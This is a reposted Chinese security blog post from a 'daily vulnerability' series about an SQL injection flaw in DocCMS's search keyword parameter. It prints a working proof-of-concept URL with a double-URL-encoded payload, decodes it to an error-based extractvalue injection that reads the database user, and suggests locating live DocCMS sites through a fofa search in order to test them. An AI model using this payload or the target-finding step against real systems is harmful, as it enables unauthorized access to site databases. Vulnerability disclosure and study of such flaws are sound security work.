【每日一洞】DocCms SQL注入漏洞

admin 2022年7月14日03:24:54评论288 views字数 1087阅读3分37秒阅读模式

【每日一洞】DocCms SQL注入漏洞

前言

【每日一洞】DocCms SQL注入漏洞

【每日一洞】DocCms SQL注入漏洞

DocCms[音译:稻壳Cms] ,定位于为企业、站长、开发者、网络公司、VI策划设计公司、SEO推广营销公司、网站初学者等用户 量身打造的一款全新企业建站、内容管理系统,服务于企业品牌信息化建设,也适应用个人、门户网站建设!

官方网站

【每日一洞】DocCms SQL注入漏洞


【每日一洞】DocCms SQL注入漏洞


【每日一洞】DocCms SQL注入漏洞

漏洞描述

【每日一洞】DocCms SQL注入漏洞

【每日一洞】DocCms SQL注入漏洞

DocCMS keyword参数存在 SQL注入漏洞,攻击者通过漏洞可以获取数据库信息

【每日一洞】DocCms SQL注入漏洞




【每日一洞】DocCms SQL注入漏洞

漏洞影响范围

【每日一洞】DocCms SQL注入漏洞



DocCMS


【每日一洞】DocCms SQL注入漏洞

漏洞复现



可以在DocCMS官网下载,本地部署验证漏洞

验证POC



/search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33


【每日一洞】DocCms SQL注入漏洞


其中payload为下列语句的二次Url编码' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#



此漏洞属于SQL 报错注入漏洞,此漏洞原理及利用不在解释,自行百度搜索。参考利用链接:

https://blog.csdn.net/l2872253606/article/details/124423275

https://blog.csdn.net/weixin_46706771/article/details/112768348



漏洞挖掘

可以利用网络空间搜索引擎,搜索相关CMS,验证漏洞是否存在。例如fofa搜索:app=”DocCMS”



【每日一洞】DocCms SQL注入漏洞





原文始发于微信公众号(安全透视镜):【每日一洞】DocCms SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月14日03:24:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【每日一洞】DocCms SQL注入漏洞http://cn-sec.com/archives/1176315.html

发表评论

匿名网友 填写信息